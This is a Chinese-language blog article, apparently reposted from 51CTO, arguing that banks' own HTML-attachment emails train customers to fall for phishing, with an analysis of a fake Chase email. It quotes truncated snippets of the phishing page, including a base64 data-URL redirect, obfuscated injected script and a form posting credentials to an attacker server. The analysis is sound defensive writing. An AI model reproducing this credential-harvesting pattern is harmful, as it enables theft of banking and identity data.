换个角度看看,为什么钓鱼攻击总能成功?

当我第一次收到银行发来的“安全”邮件时,我第一反应就是这里是否有诈?因为在我看来,它实在是太像钓鱼邮件了。这封躺在收件箱里的邮件来源于我银行经理的个人邮箱地址,而非Chase银行的官方邮箱。邮件中不仅附带有一个HTML页面,而且还有文字告诉我“在浏览器中打开这个页面以了解如何进行下一步操作”,这一切瞬间让我提高了警惕。

首先,本身电子邮件这个东西就是不安全的,更何况是我的银行还发送了一封带有附件的“安全”邮件给我。这看起来就像是一次教科书般的钓鱼攻击,所以我赶紧拿起电话直接打给了我的银行经理。

“不是的,这是合法邮件。我需要你将它打印出来,然后签署一些文件。”这就是银行经理给我的回答。

但我说到:“首先,邮件发送人的地址看起来就非常可疑,而且这种邮件不仅要让我点击外部链接并打开附件,而且还要我在Web表单中填写我的个人信息,这谁会信啊?”

银行经理说到:“我完全理解,这确实会让人怀疑。但这封邮件没有任何问题,我的确发过这封邮件给你,如果需要的话我还可以再发一次。”

于是乎,他果然又发了一封给我。这封重发的邮件看起来与之前那封完全一样,但这一次我正在与我的银行经理通话,所以我按照要求打开了附件。邮件中有一个“点击读取信息”的按钮,点击之后将我重定向到了Chase银行的安全邮件门户网站。但是整个过程让我感到非常的奇葩,我也将我担心的地方告诉了我的银行经理、他的上司、以及Chase的客户支持部门。

值得一提的是,我们是不可能完完全全地对客户的行为进行安全培训的,而银行所采用的交互方式与钓鱼攻击几乎没有区别,这就非常危险了。

攻击分析

近期,我收到了一封真正的钓鱼邮件。这封邮件来自chase.online@chasee.com,它很明显是封伪造的邮件,但如果不仔细的话还是看不出什么端倪的。这封邮件声称我的银行账号近期出现了很多错误操作,并且跟之前那封真实的邮件一样,它也让我在浏览器中打开附件HTML文件并按提示进行操作。

但很明显我不会按它说的做!于是,我把HTML文件下载了下来,然后把它拖到了代码审查窗口中。我发现,除了正常的HTML代码之外,文件中还包含一段脚本代码:



    

  1. window.location="data:text/html;base64,PCFET0NUWVBFIEhUTUwg... 
    2. 



这个页面会在地址栏中显示一大堆Base64编码的数据,代码本身包含有Chase银行官网的脚本、图片以及指向合法页面的链接,整个页面看起来和正常的Chase银行登录页面没什么区别。但是,代码中还包含有其他的脚本代码(经过混淆),这些代码会在登录页面中添加一个自定义的表单:




    

  1. document.write(unescape('%3C%66%6F%72... 
    2. 



在对代码进行了反混淆之后,我发现所有的代码都与Chase银行的真实登录页面一致,只不过表单action属性指向的是攻击者所控制的服务器。




    

  1. <form action="http://191..."class="button" method="post" name="submit"id="submit"> 
    2. 



如果不知情的用户真的在浏览器中打开了这个页面,那么他们将会看到一个带有Chase商标的页面让他们确认以下信息:


    

  • 账号登录信息
    • 

  • 联系信息
    • 

  • 银行卡信息
    • 

  • 社保号和驾驶证信息等等
    • 



上述所有的这些信息都不会提交给Chase,而是提交给了攻击者自己的服务器。这台由攻击者控制的服务器在成功获取到了这些数据之后,会将用户重定向到Chase的在线登录页面,所以这会让用户完全无法察觉到异常。我认为,之所以用户会这样做,完全是因为Chase平时对用户的“训练”所导致的(通过邮件附件要求用户提供身份验证信息)。


如何保护自己


除非Chase银行不再通过这种带有附件HTML的邮件来要求用户登录并填写自己的信息,否则广大Chase银行的客户还是免不了遭受钓鱼攻击。但是,我们仍然有很多方法可以避免自己落入这种网络钓鱼陷阱之中。




首先,千万不要直接打开邮件中的附件网页,除非你能够百分之百确定这封邮件没有任何问题。其次,永远不要轻易在任何网页中填写自己的个人信息。第三,如果邮件要求你提供个人信息,而你也不得不这样做的话,请直接访问在线服务的官方网站去填写,千万不要图方便直接点击邮件中的地址。这些方法同样适用于电话钓鱼。永远不要轻易在电话中给出自己的个人信息,除非那个电话是你打过去的。


最后,请你不要嫌麻烦,一定要将所有不正常的情况上报给自己的服务商。当你遇到了勒索邮件或有人尝试通过电话来窃取你的信息时,请一定要即使报告。


总结


实际上,如果想要保护用户不受网路钓鱼攻击的侵害,仅仅依靠提高用户安全意识还是远远不够的,这个过程中厂商也要负起一定的责任。所谓心中无鬼,天下无鬼。很多厂商知道这封邮件是他们自己发的,就不会太在意去证明邮件的安全性与合法性,但对于用户来说,当他们习惯了这样的交互方式时,也就给了钓鱼攻击者可乘之机。


作者:Alpha_h4ck

来源:51CTO
				


				
时间: 2024-08-04 06:49:53

		
		


		


	

	
	

		


		
换个角度看看,为什么钓鱼攻击总能成功?的相关文章


								

		

			

                警惕!钓鱼攻击“恋上”社交网络
			

		

		

									

				根据Websense安全实验室发布的"2012年威胁报告",我们看到基于社交网络的钓鱼攻击日益猖狂,甚至已经成为黑客成功进行数据窃取攻击的主要渠道.近日,WebsenseThreatSeeker网络就检测到新浪微博上正在发生一起最新的以获利为目的钓鱼攻击活动,截止发稿时间,黑客设计钓鱼信息已被发送和转发超过320万次.新浪微薄拥有超过3亿注册用户,此次攻击的影响力将不容小觑. 在该钓鱼攻击事件中,攻击者首先攻击并控制了部分正常的微薄账户,然后再利用这些账户散播钓鱼信息.这些账户经过设置			

		

	

				

		

			

                网络钓鱼大讲堂 Part1 | 网络钓鱼攻击定义及历史
			

		

		

									

				何为网络钓鱼攻击? 首先,我们看一下网络钓鱼攻击的定义:网络钓鱼攻击(phishing与fishing发音相近)是最初通过发送消息或邮件,意图引诱计算机用户提供个人敏感信息如密码.生日.信用卡卡号以及社保账号的一种攻击方式.为实施此类网络诈骗,攻击者将自己伪装成某个网站的官方代表或与用户可能有业务往来的机构(如PayPal.亚马逊.联合包裹服务公司(UPS)和美国银行等)的代表. 攻击者发送的通信内容的标题可能包含"iPad赠品"."欺诈告警"或其他诱惑性内容.邮件			

		

	

				

		

			

                target=”_blank” 有漏洞了 Html打开新窗口也能实施钓鱼攻击
			

		

		

									

				target="_blank"这个看着眼熟吗? target="_blank"有漏洞了.这个属性是用在html 代码中打开一个新窗口,然而这个动作将会给攻击者实施钓鱼攻击带来机会. ​现在,许多主流的互联网服务提供商都会在网页的链接地址中加入target="_blank"属性,而这绝对是一种非常不安全的行为.不仅如此,target="_blank"属性还将会使广大互联网用户暴露在钓鱼攻击的风险之下. 早在2014年,就已经有很			

		

	

				

		

			

                钓鱼攻击之猖獗程度已达历史新高的十项理由
			

		

		

									

				冒充尼日利亚王子之类的伎俩早已过时--如今钓鱼欺诈活动已经成为极为复杂的业务体系,即使是最具经验的安全专家都有可能被其骗倒. 几十年来,网络钓鱼邮件已经成为计算机领域中的一大安全祸根,当然我们也使出了浑身解数.努力将其扼杀在摇篮当中.时至今日,大多数普通用户已经能够通过标题行意识到其邪恶本质,并在发现之后直接将其删除.而如果大家无法完全确定其性质并将其打开,那么其中过于正式的问候方式.诡异的国外发送地址.拼写错误.荒谬到无法形容的奖励内容描述乃至过于殷勤的产品推销言辞都能够让我们立刻发现其背后潜			

		

	

				

		

			

                网络钓鱼大讲堂 Part3 | 网络钓鱼攻击向量介绍
			

		

		

									

				网络钓鱼攻击的目的包括: 窃取数据及金融诈骗 高级持续性威胁(APT) 恶意软件传播 网络钓鱼这种攻击方式早就存在,但至今仍受攻击者青睐.在搭建了合适的钓鱼网络.收集了信息以及放置诱饵之后,攻击者可入侵任何公司.组织甚或政府机构,造成极大破坏.实际上,时至今日,网络钓鱼仍是最有效.最受攻击者欢迎的攻击向量. 数据窃取与金融诈骗 根据PhishLabs于2016年所作研究,2015年22%的鱼叉式钓鱼攻击的动机均为金融诈骗或其他相关犯罪.通过这种攻击方式,攻击者获利颇丰,所以该类事件不胜枚举.例如			

		

	

				

		

			

                网络钓鱼大讲堂 Part4 | 网络钓鱼攻击战术
			

		

		

									

				要防护网络钓鱼攻击并制定相应计划,深入了解攻击者很关键,需要更多地了解此类攻击过程,包括从初始计划及准备阶段到钓鱼网络如何协助攻击发生,再到提交诱饵并收集数据 这些信息不仅可以帮助企业和组织对不可避免的攻击做到有备无患,在他们制定对抗攻击的关键步骤时还能提供重要的参考,有时甚至可以预防攻击.尽管无法保证攻击者不攻击您或您的企业,但请记住"凡事预则立". 计划与准备 像任何军事活动一样,网络钓鱼攻击都是从很多琐碎的工作开始的.发起攻击前,需要进行大量的研究和细致的计划与准备.很多情况下,			

		

	

				

		

			

                技术解析:如何利用伪造的“附件”对Gmail用户进行钓鱼攻击?
			

		

		

									

				攻击事件概述 根据安全研究专家的最新发现,网络犯罪分子们目前正在利用一种经过特殊设计的URL链接来对Gmail用户进行网络钓鱼攻击.当用户点击了恶意链接之后,攻击者会诱使他们输入自己的Gmail邮箱凭证,然后获取到目标用户的邮箱密码.需要注意的是,它与之前那些网络钓鱼攻击不同,这是一种非常复杂的新型网络钓鱼攻击,即使是一些专业的安全技术人员也有可能会被攻击者欺骗. 攻击技术分析 攻击者会制作一个钓鱼网页,然后利用精心设计的URL地址来欺骗用户访问该页面,然后输入自己的账户凭证,这也是网络钓鱼攻击			

		

	

				

		

			

                IE极度危险XSS漏洞 开启高度可信钓鱼攻击
			

		

		

									

				本文讲的是IE极度危险XSS漏洞 开启高度可信钓鱼攻击,IE浏览器一个通用跨站脚本漏洞(XSS)近日被安全人员披露,该漏洞允许攻击者绕过浏览器安全机制同源策略(SOP),发起高可信网络钓鱼攻击或在任意网站上劫持用户帐户.杜森(Deusen)安全咨询公司的研究员大卫·利奥在漏洞披露文章中介绍了漏洞的详细信息. 文章中利用概念验证链接dailymail.co.uk,作为攻击目标进行演示.根据演示链接,当在最新安装的Windows8.1操作系统的计算机上打开网页浏览器IE11时,利用页面为用户提供了一			

		

	

				

		

			

                如何对有双因子认证站点进行钓鱼攻击?
			

		

		

									

				本文讲的是如何对有双因子认证站点进行钓鱼攻击?, 我们假设攻击者已经获得了一组有效的员工登录凭据,而这时如果您没有多因素身份验证(MFA),那么攻击者毫无疑问就像是中了大奖,因为他们可以快速的获得该用户名和密码下的公开资产. 但是如果你有MFA呢?比如您有一个需要认证登录的门户来作为您敏感的公共资产的守护者,并且它受到MFA的保护. 这样你就认为你的站点是安全的,对吗? 事实并非如此. 也许您的站点登录情况对于那些是使用受到破坏的凭据的站点来说是相对安全的.然而,攻击者仍然可以通过MFA进程进行